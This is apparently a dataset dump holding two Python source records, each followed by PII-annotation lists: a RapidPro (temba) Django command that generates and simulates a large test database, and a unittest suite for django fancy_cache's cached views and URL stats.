UUIDs for the same seed, see https://github.com/joke2k/faker/issues/484#issuecomment-287931101 + from temba.utils import models + models.uuid4 = lambda: uuid.UUID(int=(self.random.getrandbits(128) | (1 << 63) | (1 << 78)) & (~(1 << 79) & ~(1 << 77) & ~(1 << 76) & ~(1 << 62))) + + # We want a variety of large and small orgs so when allocating content like contacts and messages, we apply a + # bias toward the beginning orgs. if there are N orgs, then the amount of content the first org will be + # allocated is (1/N) ^ (1/bias). This sets the bias so that the first org will get ~50% of the content: + self.org_bias = math.log(1.0 / num_orgs, 0.5) + + return seed + + def load_locations(self, path): + """""" + Loads admin boundary records from the given dump of that table + """""" + self._log(""Loading locations from %s... 
"" % path) + + # load dump into current db with pg_restore + db_config = settings.DATABASES['default'] + try: + check_call('export PGPASSWORD=%s && pg_restore -U%s -w -d %s %s' % + (db_config['PASSWORD'], db_config['USER'], db_config['NAME'], path), shell=True) + except CalledProcessError: # pragma: no cover + raise CommandError(""Error occurred whilst calling pg_restore to load locations dump"") + + # fetch as tuples of (WARD, DISTRICT, STATE) + wards = AdminBoundary.objects.filter(level=3).prefetch_related('parent', 'parent__parent') + locations = [(w, w.parent, w.parent.parent) for w in wards] + + country = AdminBoundary.objects.filter(level=0).get() + + self._log(self.style.SUCCESS(""OK"") + '\n') + return country, locations + + def create_orgs(self, superuser, country, num_total): + """""" + Creates and initializes the orgs + """""" + self._log(""Creating %d orgs... "" % num_total) + + org_names = ['%s %s' % (o1, o2) for o2 in ORG_NAMES[1] for o1 in ORG_NAMES[0]] + self.random.shuffle(org_names) + + orgs = [] + for o in range(num_total): + orgs.append(Org(name=org_names[o % len(org_names)], timezone=self.random.choice(pytz.all_timezones), + brand='rapidpro.io', country=country, + created_on=self.db_begins_on, created_by=superuser, modified_by=superuser)) + Org.objects.bulk_create(orgs) + orgs = list(Org.objects.order_by('id')) + + self._log(self.style.SUCCESS(""OK"") + ""\nInitializing orgs... "") + + for o, org in enumerate(orgs): + org.initialize(topup_size=max((1000 - o), 1) * 1000) + + # we'll cache some metadata on each org as it's created to save re-fetching things + org.cache = { + 'users': [], + 'fields': {}, + 'groups': [], + 'system_groups': {g.group_type: g for g in ContactGroup.system_groups.filter(org=org)}, + } + + self._log(self.style.SUCCESS(""OK"") + '\n') + return orgs + + def create_users(self, orgs): + """""" + Creates a user of each type for each org + """""" + self._log(""Creating %d users... "" % (len(orgs) * len(USERS))) + + # create users for each org + for org in orgs: + for u in USERS: + user = User.objects.create_user(u['username'] % org.id, u['email'] % org.id, USER_PASSWORD) + getattr(org, u['role']).add(user) + user.set_org(org) + org.cache['users'].append(user) + + self._log(self.style.SUCCESS(""OK"") + '\n') + + def create_channels(self, orgs): + """""" + Creates the channels for each org + """""" + self._log(""Creating %d channels... "" % (len(orgs) * len(CHANNELS))) + + for org in orgs: + user = org.cache['users'][0] + for c in CHANNELS: + Channel.objects.create(org=org, name=c['name'], channel_type=c['channel_type'], + address=c['address'], schemes=[c['scheme']], + created_by=user, modified_by=user) + + self._log(self.style.SUCCESS(""OK"") + '\n') + + def create_fields(self, orgs): + """""" + Creates the contact fields for each org + """""" + self._log(""Creating %d fields... "" % (len(orgs) * len(FIELDS))) + + for org in orgs: + user = org.cache['users'][0] + for f in FIELDS: + field = ContactField.objects.create(org=org, key=f['key'], label=f['label'], + value_type=f['value_type'], show_in_table=True, + created_by=user, modified_by=user) + org.cache['fields'][f['key']] = field + + self._log(self.style.SUCCESS(""OK"") + '\n') + + def create_groups(self, orgs): + """""" + Creates the contact groups for each org + """""" + self._log(""Creating %d groups... 
"" % (len(orgs) * len(GROUPS))) + + for org in orgs: + user = org.cache['users'][0] + for g in GROUPS: + if g['query']: + group = ContactGroup.create_dynamic(org, user, g['name'], g['query']) + else: + group = ContactGroup.user_groups.create(org=org, name=g['name'], created_by=user, modified_by=user) + group.member = g['member'] + group.count = 0 + org.cache['groups'].append(group) + + self._log(self.style.SUCCESS(""OK"") + '\n') + + def create_labels(self, orgs): + """""" + Creates the message labels for each org + """""" + self._log(""Creating %d labels... "" % (len(orgs) * len(LABELS))) + + for org in orgs: + user = org.cache['users'][0] + for name in LABELS: + Label.label_objects.create(org=org, name=name, created_by=user, modified_by=user) + + self._log(self.style.SUCCESS(""OK"") + '\n') + + def create_flows(self, orgs): + """""" + Creates the flows for each org + """""" + self._log(""Creating %d flows... "" % (len(orgs) * len(FLOWS))) + + for org in orgs: + user = org.cache['users'][0] + for f in FLOWS: + with open('media/test_flows/' + f['file'], 'r') as flow_file: + org.import_app(json.load(flow_file), user) + + self._log(self.style.SUCCESS(""OK"") + '\n') + + def create_contacts(self, orgs, locations, num_contacts): + """""" + Creates test and regular contacts for this database. Returns tuples of org, contact id and the preferred urn + id to avoid trying to hold all contact and URN objects in memory. + """""" + group_counts = defaultdict(int) + + self._log(""Creating %d test contacts..."" % (len(orgs) * len(USERS))) + + for org in orgs: + test_contacts = [] + for user in org.cache['users']: + test_contacts.append(Contact.get_test_contact(user)) + org.cache['test_contacts'] = test_contacts + + self._log(self.style.SUCCESS(""OK"") + '\n') + self._log(""Creating %d regular contacts...\n"" % num_contacts) + + # disable table triggers to speed up insertion and in the case of contact group m2m, avoid having an unsquashed + # count row for every contact + with DisableTriggersOn(Contact, ContactURN, Value, ContactGroup.contacts.through): + names = [('%s %s' % (c1, c2)).strip() for c2 in CONTACT_NAMES[1] for c1 in CONTACT_NAMES[0]] + names = [n if n else None for n in names] + + batch_num = 1 + for index_batch in chunk_list(six.moves.xrange(num_contacts), self.batch_size): + batch = [] + + # generate flat representations and contact objects for this batch + for c_index in index_batch: # pragma: no cover + org = self.random_org(orgs) + name = self.random_choice(names) + location = self.random_choice(locations) if self.probability(CONTACT_HAS_FIELD_PROB) else None + created_on = self.timeline_date(c_index / num_contacts) + + c = { + 'org': org, + 'user': org.cache['users'][0], + 'name': name, + 'groups': [], + 'tel': '+2507%08d' % c_index if self.probability(CONTACT_HAS_TEL_PROB) else None, + 'twitter': '%s%d' % (name.replace(' ', '_').lower() if name else 'tweep', c_index) if self.probability(CONTACT_HAS_TWITTER_PROB) else None, + 'gender': self.random_choice(('M', 'F')) if self.probability(CONTACT_HAS_FIELD_PROB) else None, + 'age': self.random.randint(16, 80) if self.probability(CONTACT_HAS_FIELD_PROB) else None, + 'joined': self.random_date() if self.probability(CONTACT_HAS_FIELD_PROB) else None, + 'ward': location[0] if location else None, + 'district': location[1] if location else None, + 'state': location[2] if location else None, + 'language': self.random_choice(CONTACT_LANGS), + 'is_stopped': self.probability(CONTACT_IS_STOPPED_PROB), + 'is_blocked': 
self.probability(CONTACT_IS_BLOCKED_PROB), + 'is_active': self.probability(1 - CONTACT_IS_DELETED_PROB), + 'created_on': created_on, + 'modified_on': self.random_date(created_on, self.db_ends_on), + } + + # work out which system groups this contact belongs to + if c['is_active']: + if not c['is_blocked'] and not c['is_stopped']: + c['groups'].append(org.cache['system_groups'][ContactGroup.TYPE_ALL]) + if c['is_blocked']: + c['groups'].append(org.cache['system_groups'][ContactGroup.TYPE_BLOCKED]) + if c['is_stopped']: + c['groups'].append(org.cache['system_groups'][ContactGroup.TYPE_STOPPED]) + + # let each user group decide if it is taking this contact + for g in org.cache['groups']: + if g.member(c) if callable(g.member) else self.probability(g.member): + c['groups'].append(g) + + # track changes to group counts + for g in c['groups']: + group_counts[g] += 1 + + batch.append(c) + + self._create_contact_batch(batch) + self._log("" > Created batch %d of %d\n"" % (batch_num, max(num_contacts // self.batch_size, 1))) + batch_num += 1 + + # create group count records manually + counts = [] + for group, count in group_counts.items(): + counts.append(ContactGroupCount(group=group, count=count, is_squashed=True)) + group.count = count + ContactGroupCount.objects.bulk_create(counts) + + def _create_contact_batch(self, batch): + """""" + Bulk creates a batch of contacts from flat representations + """""" + for c in batch: + c['object'] = Contact(org=c['org'], name=c['name'], language=c['language'], + is_stopped=c['is_stopped'], is_blocked=c['is_blocked'], + is_active=c['is_active'], + created_by=c['user'], created_on=c['created_on'], + modified_by=c['user'], modified_on=c['modified_on']) + Contact.objects.bulk_create([c['object'] for c in batch]) + + # now that contacts have pks, bulk create the actual URN, value and group membership objects + batch_urns = [] + batch_values = [] + batch_memberships = [] + + for c in batch: + org = c['org'] + c['urns'] = [] + + if c['tel']: + c['urns'].append(ContactURN(org=org, contact=c['object'], priority=50, scheme=TEL_SCHEME, + path=c['tel'], identity=URN.from_tel(c['tel']))) + if c['twitter']: + c['urns'].append(ContactURN(org=org, contact=c['object'], priority=50, scheme=TWITTER_SCHEME, + path=c['twitter'], identity=URN.from_twitter(c['twitter']))) + if c['gender']: + batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['gender'], + string_value=c['gender'])) + if c['age']: + batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['age'], + string_value=str(c['age']), decimal_value=c['age'])) + if c['joined']: + batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['joined'], + string_value=datetime_to_str(c['joined']), datetime_value=c['joined'])) + if c['ward']: + batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['ward'], + string_value=c['ward'].name, location_value=c['ward'])) + if c['district']: + batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['district'], + string_value=c['district'].name, location_value=c['district'])) + if c['state']: + batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['state'], + string_value=c['state'].name, location_value=c['state'])) + for g in c['groups']: + batch_memberships.append(ContactGroup.contacts.through(contact=c['object'], contactgroup=g)) + + batch_urns += c['urns'] + + 
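# The related rows are flushed in bulk below; bulk_create() skips per-object + # save() calls and model signals, which is what keeps this generator fast. + 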
ContactURN.objects.bulk_create(batch_urns) + Value.objects.bulk_create(batch_values) + ContactGroup.contacts.through.objects.bulk_create(batch_memberships) + + def simulate_activity(self, orgs, num_runs): + self._log(""Starting simulation. Ctrl+C to cancel...\n"") + + runs = 0 + while runs < num_runs: + try: + with transaction.atomic(): + # make sure every org has an active flow + for org in orgs: + if not org.cache['activity']: + self.start_flow_activity(org) + + with transaction.atomic(): + org = self.random_org(orgs) + + if self.probability(0.1): + self.create_unsolicited_incoming(org) + else: + self.create_flow_run(org) + runs += 1 + + except KeyboardInterrupt: + self._log(""Shutting down...\n"") + break + + squash_channelcounts() + squash_flowpathcounts() + squash_flowruncounts() + prune_recentmessages() + squash_topupcredits() + squash_labelcounts() + + def start_flow_activity(self, org): + assert not org.cache['activity'] + + user = org.cache['users'][0] + flow = self.random_choice(org.cache['flows']) + + if self.probability(0.9): + # start a random group using a flow start + group = self.random_choice(org.cache['groups']) + contacts_started = list(group.contacts.values_list('id', flat=True)) + + self._log("" > Starting flow %s for group %s (%d) in org %s\n"" + % (flow.name, group.name, len(contacts_started), org.name)) + + start = FlowStart.create(flow, user, groups=[group], restart_participants=True) + start.start() + else: + # start a random individual without a flow start + if not org.cache['contacts']: + return + + contact = Contact.objects.get(id=self.random_choice(org.cache['contacts'])) + contacts_started = [contact.id] + + self._log("" > Starting flow %s for contact #%d in org %s\n"" % (flow.name, contact.id, org.name)) + + flow.start([], [contact], restart_participants=True) + + org.cache['activity'] = {'flow': flow, 'unresponded': contacts_started, 'started': list(contacts_started)} + + def end_flow_activity(self, org): + self._log("" > Ending flow %s in org %s\n"" % (org.cache['activity']['flow'].name, org.name)) + + org.cache['activity'] = None + + runs = FlowRun.objects.filter(org=org, is_active=True) + FlowRun.bulk_exit(runs, FlowRun.EXIT_TYPE_EXPIRED) + + def create_flow_run(self, org): + activity = org.cache['activity'] + flow = activity['flow'] + + if activity['unresponded']: + contact_id = self.random_choice(activity['unresponded']) + activity['unresponded'].remove(contact_id) + + contact = Contact.objects.get(id=contact_id) + urn = contact.urns.first() + + if urn: + self._log("" > Receiving flow responses for flow %s in org %s\n"" % (flow.name, flow.org.name)) + + inputs = self.random_choice(flow.input_templates) + + for text in inputs: + channel = flow.org.cache['channels'][0] + Msg.create_incoming(channel, six.text_type(urn), text) + + # if more than 10% of contacts have responded, consider flow activity over + if len(activity['unresponded']) <= (len(activity['started']) * 0.9): + self.end_flow_activity(flow.org) + + def create_unsolicited_incoming(self, org): + if not org.cache['contacts']: + return + + self._log("" > Receiving unsolicited incoming message in org %s\n"" % org.name) + + available_contacts = list(set(org.cache['contacts']) - set(org.cache['activity']['started'])) + if available_contacts: + contact = Contact.objects.get(id=self.random_choice(available_contacts)) + channel = self.random_choice(org.cache['channels']) + urn = contact.urns.first() + if urn: + text = ' '.join([self.random_choice(l) for l in INBOX_MESSAGES]) +
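# hand the composed text to Msg.create_incoming so it flows through the normal inbound-message pipeline +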
Msg.create_incoming(channel, six.text_type(urn), text) + + def probability(self, prob): + return self.random.random() < prob + + def random_choice(self, seq, bias=1.0): + if not seq: + raise ValueError(""Can't select random item from empty sequence"") + + return seq[int(math.pow(self.random.random(), bias) * len(seq))] + + def weighted_choice(self, seq, weights): + r = self.random.random() * sum(weights) + cum_weight = 0.0 + + for i, item in enumerate(seq): + cum_weight += weights[i] + if r < cum_weight or (i == len(seq) - 1): + return item + + def random_org(self, orgs): + """""" + Returns a random org with bias toward the orgs with the lowest indexes + """""" + return self.random_choice(orgs, bias=self.org_bias) + + def random_date(self, start=None, end=None): + if not end: + end = timezone.now() + if not start: + start = end - timedelta(days=365) + + if start == end: + return end + + return ms_to_datetime(self.random.randrange(datetime_to_ms(start), datetime_to_ms(end))) + + def timeline_date(self, dist): + """""" + Converts a 0..1 distance into a date on this database's overall timeline + """""" + seconds_span = (self.db_ends_on - self.db_begins_on).total_seconds() + + return self.db_begins_on + timedelta(seconds=(seconds_span * dist)) + + @staticmethod + def peak_memory(): + rusage_denom = 1024 + if sys.platform == 'darwin': + # OSX gives value in bytes, other OSes in kilobytes + rusage_denom *= rusage_denom + return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / rusage_denom + + def _log(self, text): + self.stdout.write(text, ending='') + self.stdout.flush() + + +class DisableTriggersOn(object): + """""" + Helper context manager for temporarily disabling database triggers for a given model + """""" + def __init__(self, *models): + self.tables = [m._meta.db_table for m in models] + + def __enter__(self): + with connection.cursor() as cursor: + for table in self.tables: + cursor.execute('ALTER TABLE %s DISABLE TRIGGER ALL;' % table) + + def __exit__(self, exc_type, exc_val, exc_tb): + with connection.cursor() as cursor: + for table in self.tables: + cursor.execute('ALTER TABLE %s ENABLE TRIGGER ALL;' % table) +",30703,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['LOCATION', 'django_redis'], ['LOCATION', 'URN'], ['LOCATION', 'ms_to_datetime'], ['LOCATION', 'USER_PASSWORD'], ['LOCATION', 'Chile'], ['LOCATION', 'Indonesia'], ['LOCATION', 'Rwanda'], ['LOCATION', 'Mexico'], ['LOCATION', 'Zambia'], ['LOCATION', 'India'], ['LOCATION', 'Brazil'], ['LOCATION', 'Sudan'], ['LOCATION', 'TYPE_ANDROID'], ['LOCATION', 'Faskari'], ['LOCATION', 'Zuru'], ['PERSON', 'Anka'], ['PERSON', ""c['district'].name""], ['PERSON', 'Anka'], ['PERSON', 'LABELS'], ['PERSON', 'jeb'], ['PERSON', 'Anne'], ['PERSON', 'Bob'], ['PERSON', 'Cathy'], ['PERSON', 'Dave'], ['PERSON', 'Evan'], ['PERSON', 'George'], ['PERSON', 'Igor'], ['PERSON', 'Jameson'], ['PERSON', 'Lopez'], ['PERSON', 'Mooney'], ['PERSON', 'Roberts'], ['NRP', 'CONTACT_HAS_TWITTER_PROB'], ['DATE_TIME', 'today'], ['LOCATION', 'USER_PASSWORD'], ['LOCATION', 'DISTRICT'], ['LOCATION', 'USER_PASSWORD'], ['NRP', ""org.cache['users'].append(user""], ['PERSON', 'len(CHANNELS'], ['PERSON', 'group.member'], ['PERSON', 'LABELS'], ['NRP', 'index_batch'], ['PERSON', 'tweep'], ['LOCATION', 'group.name'], ['PERSON', 'darwin'], ['DATE_TIME', 'RUSAGE_SELF).ru_maxrss / rusage_denom'], ['URL', 
'https://github.com/joke2k/faker/issues/484#issuecomment-287931101'], ['URL', 'django.co'], ['URL', 'django.contrib.auth.mo'], ['URL', 'django.core.ma'], ['URL', 'django.core.management.ba'], ['URL', 'temba.channels.mo'], ['URL', 'temba.ch'], ['URL', 'temba.contacts.mo'], ['URL', 'temba.flows.mo'], ['URL', 'temba.locations.mo'], ['URL', 'temba.msgs.mo'], ['URL', 'temba.ms'], ['URL', 'temba.orgs.mo'], ['URL', 'temba.org'], ['URL', 'temba.values.mo'], ['URL', 'nigeria.bi'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'parser.ad'], ['URL', 'subparsers.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'subparsers.ad'], ['URL', 'parser.ad'], ['URL', 'self.COM'], ['URL', 'self.pe'], ['URL', 'self.co'], ['URL', 'self.ba'], ['URL', 'timezone.no'], ['URL', 'self.style.SU'], ['URL', 'User.objects.cr'], ['URL', 'email.com'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.co'], ['URL', 'Channel.CH'], ['URL', 'flow.in'], ['URL', 'flow.na'], ['URL', 'org.ca'], ['URL', 'org.ge'], ['URL', 'org.ch'], ['URL', 'ContactGroup.us'], ['URL', 'groups.fi'], ['URL', 'org.org'], ['URL', 'contacts.va'], ['URL', 'self.style.SU'], ['URL', 'self.si'], ['URL', 'self.random.ge'], ['URL', 'self.org'], ['URL', 'AdminBoundary.objects.fi'], ['URL', 'w.pa'], ['URL', 'w.parent.pa'], ['URL', 'AdminBoundary.objects.fi'], ['URL', 'self.style.SU'], ['URL', 'self.random.sh'], ['URL', 'self.random.ch'], ['URL', 'pytz.al'], ['URL', 'rapidpro.io'], ['URL', 'self.style.SU'], ['URL', 'org.in'], ['URL', 'org.ca'], ['URL', 'g.gr'], ['URL', 'ContactGroup.sy'], ['URL', 'groups.fi'], ['URL', 'self.style.SU'], ['URL', 'User.objects.cr'], ['URL', 'org.id'], ['URL', 'org.id'], ['URL', 'user.se'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'Channel.objects.cr'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'ContactField.objects.cr'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'ContactGroup.cr'], ['URL', 'ContactGroup.us'], ['URL', 'groups.cr'], ['URL', 'group.me'], ['URL', 'group.co'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'Label.la'], ['URL', 'objects.cr'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'org.im'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'Contact.ge'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'ContactGroup.contacts.th'], ['URL', 'six.mo'], ['URL', 'self.ba'], ['URL', 'self.pro'], ['URL', 'org.ca'], ['URL', 'self.pro'], ['URL', 'name.re'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'g.me'], ['URL', 'g.me'], ['URL', 'self.pro'], ['URL', 'g.me'], ['URL', 'self.ba'], ['URL', 'counts.it'], ['URL', 'group.co'], ['URL', 'URN.fr'], ['URL', 'URN.fr'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'ContactGroup.contacts.th'], ['URL', 'ContactGroup.contacts.th'], ['URL', 'transaction.at'], ['URL', 'org.ca'], ['URL', 'self.st'], ['URL', 'transaction.at'], ['URL', 'self.pro'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'self.pro'], ['URL', 'org.ca'], ['URL', 'group.contacts.va'], ['URL', 
'flow.na'], ['URL', 'group.na'], ['URL', 'org.na'], ['URL', 'FlowStart.cr'], ['URL', 'start.st'], ['URL', 'org.ca'], ['URL', 'Contact.objects.ge'], ['URL', 'org.ca'], ['URL', 'contact.id'], ['URL', 'flow.na'], ['URL', 'contact.id'], ['URL', 'org.na'], ['URL', 'flow.st'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.na'], ['URL', 'org.ca'], ['URL', 'FlowRun.objects.fi'], ['URL', 'org.ca'], ['URL', 'Contact.objects.ge'], ['URL', 'contact.urns.fi'], ['URL', 'flow.na'], ['URL', 'flow.org.na'], ['URL', 'flow.in'], ['URL', 'flow.org.ca'], ['URL', 'Msg.cr'], ['URL', 'flow.org'], ['URL', 'org.ca'], ['URL', 'org.na'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'Contact.objects.ge'], ['URL', 'org.ca'], ['URL', 'contact.urns.fi'], ['URL', 'Msg.cr'], ['URL', 'self.org'], ['URL', 'timezone.no'], ['URL', 'sys.pl'], ['URL', 'resource.ge'], ['URL', 'resource.RU'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'connection.cu'], ['URL', 'connection.cu']]" +87,"import unittest +import re +from nose.tools import eq_, ok_ +from django.test.client import RequestFactory +from django.core.cache import cache +from fancy_cache.memory import find_urls + +from . import views + + +class TestViews(unittest.TestCase): + + def setUp(self): + self.factory = RequestFactory() + + def tearDown(self): + cache.clear() + + def test_render_home1(self): + request = self.factory.get('/anything') + + response = views.home(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + + # do it again + response = views.home(request) + eq_(response.status_code, 200) + random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + eq_(random_string_1, random_string_2) + + def test_render_home2(self): + authenticated = RequestFactory(AUTH_USER='peter') + request = self.factory.get('/2') + + response = views.home2(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + + # do it again + response = views.home2(request) + eq_(response.status_code, 200) + random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + eq_(random_string_1, random_string_2) + + # do it again, but with a hint to disable cache + request = authenticated.get('/2') + response = views.home2(request) + eq_(response.status_code, 200) + random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + ok_(random_string_1 != random_string_2) + + def test_render_home3(self): + request = self.factory.get('/anything') + + response = views.home3(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + ok_('In your HTML' in response.content.decode(""utf8"")) + extra_random_1 = re.findall('In your HTML:(\w+)', response.content.decode(""utf8""))[0] + + response = views.home3(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + extra_random_2 = re.findall('In your HTML:(\w+)', response.content.decode(""utf8""))[0] + ok_('In your HTML' in response.content.decode(""utf8"")) + eq_(random_string_1, random_string_2) + # the post_process_response is only called once 
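+ # (the second request was served from the cache, so post_process_response ran only on the initial miss)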
+ eq_(extra_random_1, extra_random_2) + + def test_render_home3_no_cache(self): + factory = RequestFactory(AUTH_USER='peter') + request = factory.get('/3') + + response = views.home3(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + ok_('In your HTML' not in response.content.decode(""utf8"")) + + def test_render_home4(self): + request = self.factory.get('/4') + + response = views.home4(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + ok_('In your HTML' in response.content.decode(""utf8"")) + extra_random_1 = re.findall('In your HTML:(\w+)', response.content.decode(""utf8""))[0] + + response = views.home4(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + extra_random_2 = re.findall('In your HTML:(\w+)', response.content.decode(""utf8""))[0] + ok_('In your HTML' in response.content.decode(""utf8"")) + eq_(random_string_1, random_string_2) + # the post_process_response is now called every time + ok_(extra_random_1 != extra_random_2) + + def test_render_home5(self): + request = self.factory.get('/4', {'foo': 'bar'}) + response = views.home5(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + + request = self.factory.get('/4', {'foo': 'baz'}) + response = views.home5(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + ok_(random_string_1 != random_string_2) + + request = self.factory.get('/4', {'foo': 'baz', 'other': 'junk'}) + response = views.home5(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_3 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + eq_(random_string_2, random_string_3) + + def test_render_home5bis(self): + request = self.factory.get('/4', {'foo': 'bar'}) + response = views.home5bis(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_1 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + + request = self.factory.get('/4', {'foo': 'baz'}) + response = views.home5bis(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_2 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + ok_(random_string_1 != random_string_2) + + request = self.factory.get('/4', {'foo': 'baz', 'bar': 'foo'}) + response = views.home5bis(request) + eq_(response.status_code, 200) + ok_(re.findall('Random:\w+', response.content.decode(""utf8""))) + random_string_3 = re.findall('Random:(\w+)', response.content.decode(""utf8""))[0] + eq_(random_string_2, random_string_3) + + def test_remember_stats_all_urls(self): + request = self.factory.get('/anything') + response = views.home6(request) + eq_(response.status_code, 200) + + # now ask the memory thing + match, = find_urls(urls=['/anything']) + eq_(match[0], '/anything') + eq_(match[2]['hits'], 0) + eq_(match[2]['misses'], 1) + + # second time + response = 
views.home6(request) + eq_(response.status_code, 200) + match, = find_urls(urls=['/anything']) + eq_(match[0], '/anything') + eq_(match[2]['hits'], 1) + eq_(match[2]['misses'], 1) + + def test_remember_stats_all_urls_looong_url(self): + request = self.factory.get( + 'PI:KEY' + 'test/that/things/work/with/long/urls/too', + { + 'line1': 'Bad luck, wind been blowing at my back', + 'line2': ""I was born to bring trouble to wherever I'm at"", + 'line3': ""Got the number thirteen, tattooed on my neck"", + 'line4': ""When the ink starts to itch, "", + 'line5': ""then the black will turn to red"", + } + ) + response = views.home6(request) + eq_(response.status_code, 200) + + # now ask the memory thing + match, = find_urls() + ok_(match[0].startswith('/something/really')) + eq_(match[2]['hits'], 0) + eq_(match[2]['misses'], 1) + + # second time + response = views.home6(request) + eq_(response.status_code, 200) + match, = find_urls([]) + ok_(match[0].startswith('/something/really')) + eq_(match[2]['hits'], 1) + eq_(match[2]['misses'], 1) +",7974,"[['LOCATION', 'TestCase'], ['LOCATION', 'random_string_2'], ['LOCATION', 'random_string_2'], ['LOCATION', 'random_string_2'], ['NRP', 'post_process_response'], ['LOCATION', 'random_string_2'], ['NRP', 'post_process_response'], ['URL', 'self.factory.ge'], ['URL', 'self.factory.ge'], ['URL', 'nose.to'], ['URL', 'django.test.cl'], ['URL', 'django.core.ca'], ['URL', 'cache.me'], ['URL', 'cache.cl'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'authenticated.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 'factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 